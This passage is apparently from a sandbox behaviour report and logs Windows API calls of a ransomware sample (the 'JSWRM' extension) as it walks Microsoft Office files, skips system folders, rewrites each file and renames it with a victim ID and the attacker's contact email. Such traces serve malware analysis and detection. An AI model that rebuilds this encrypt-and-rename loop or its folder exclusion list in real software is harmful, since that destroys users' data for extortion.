(lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0101.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0101.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0101.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0101.781] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd360620a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd360620a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd375d6d3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4a4a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.onenotemui.msi.16.en-us.xml", cAlternateFileName="C24C3D~1.XML")) returned 1 [0101.781] lstrcmpiW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2=".") returned 1 [0101.781] lstrcmpiW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="..") returned 1 [0101.781] lstrcmpiW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="...") returned 1 [0101.781] lstrcmpiW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="windows") returned -1 [0101.781] lstrcmpiW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="recovery") returned -1 [0101.781] lstrcmpiW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0101.781] lstrcmpiW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0101.781] lstrcmpiW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.781] lstrcmpiW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0101.781] lstrcmpiW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="msocache") returned -1 [0101.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0101.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.onenotemui.msi.16.en-us.xml", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0101.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.onenotemui.msi.16.en-us.xml", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.onenotemui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 39 [0101.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0101.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0101.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.onenotemui.msi.16.en-us.xml", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0101.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.onenotemui.msi.16.en-us.xml", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.onenotemui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 39 [0101.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0101.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0101.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0101.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0101.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.onenotemui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.onenotemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.783] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19018) returned 1 [0101.783] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4a40) returned 0x24d210 [0101.783] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4a40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x4a40, lpOverlapped=0x0) returned 1 [0101.786] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.786] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4a40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x4a40, lpOverlapped=0x0) returned 1 [0101.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.786] CloseHandle (hObject=0x45c) returned 1 [0101.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0101.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0101.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0101.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0101.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0101.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0101.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0101.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0101.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.787] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.onenotemui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.onenotemui.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.onenotemui.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.onenotemui.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0101.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0101.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0101.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.788] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd276bb03, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd276bb03, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd29a7ddb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5f6, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", cAlternateFileName="C24EFF~1.XML")) returned 1 [0101.788] lstrcmpiW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2=".") returned 1 [0101.788] lstrcmpiW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="..") returned 1 [0101.788] lstrcmpiW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="...") returned 1 [0101.788] lstrcmpiW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="windows") returned -1 [0101.788] lstrcmpiW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="recovery") returned -1 [0101.788] lstrcmpiW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0101.788] lstrcmpiW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0101.788] lstrcmpiW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.788] lstrcmpiW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0101.788] lstrcmpiW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="msocache") returned -1 [0101.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0101.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0101.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", cchWideChar=44, lpMultiByteStr=0x22d0a0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 44 [0101.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0101.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0101.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0101.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", cchWideChar=44, lpMultiByteStr=0x22d0d8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 44 [0101.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0101.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0101.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0101.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0101.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.789] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1526) returned 1 [0101.789] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f0) returned 0x2332c0 [0101.789] ReadFile (in: hFile=0x45c, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x5f0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345ec04*=0x5f0, lpOverlapped=0x0) returned 1 [0101.800] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.800] WriteFile (in: hFile=0x45c, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345ec00*=0x5f0, lpOverlapped=0x0) returned 1 [0101.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0101.801] CloseHandle (hObject=0x45c) returned 1 [0101.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0101.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0101.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0101.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0101.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0101.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0101.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.801] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0101.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0101.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0101.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.802] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd3593a88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd3593a88, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd3678904, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b28, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.osmmui.msi.16.en-us.xml", cAlternateFileName="C25F09~1.XML")) returned 1 [0101.802] lstrcmpiW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2=".") returned 1 [0101.802] lstrcmpiW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="..") returned 1 [0101.802] lstrcmpiW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="...") returned 1 [0101.802] lstrcmpiW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="windows") returned -1 [0101.802] lstrcmpiW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="recovery") returned -1 [0101.802] lstrcmpiW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0101.802] lstrcmpiW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0101.802] lstrcmpiW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.802] lstrcmpiW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0101.802] lstrcmpiW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="msocache") returned -1 [0101.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0101.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.osmmui.msi.16.en-us.xml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0101.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.osmmui.msi.16.en-us.xml", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.osmmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 35 [0101.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0101.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0101.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.osmmui.msi.16.en-us.xml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0101.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.osmmui.msi.16.en-us.xml", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.osmmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 35 [0101.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0101.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0101.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0101.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0101.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.osmmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.osmmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.803] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11048) returned 1 [0101.803] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b20) returned 0x24d210 [0101.803] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2b20, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x2b20, lpOverlapped=0x0) returned 1 [0101.807] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.807] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2b20, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x2b20, lpOverlapped=0x0) returned 1 [0101.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.807] CloseHandle (hObject=0x45c) returned 1 [0101.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0101.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.807] 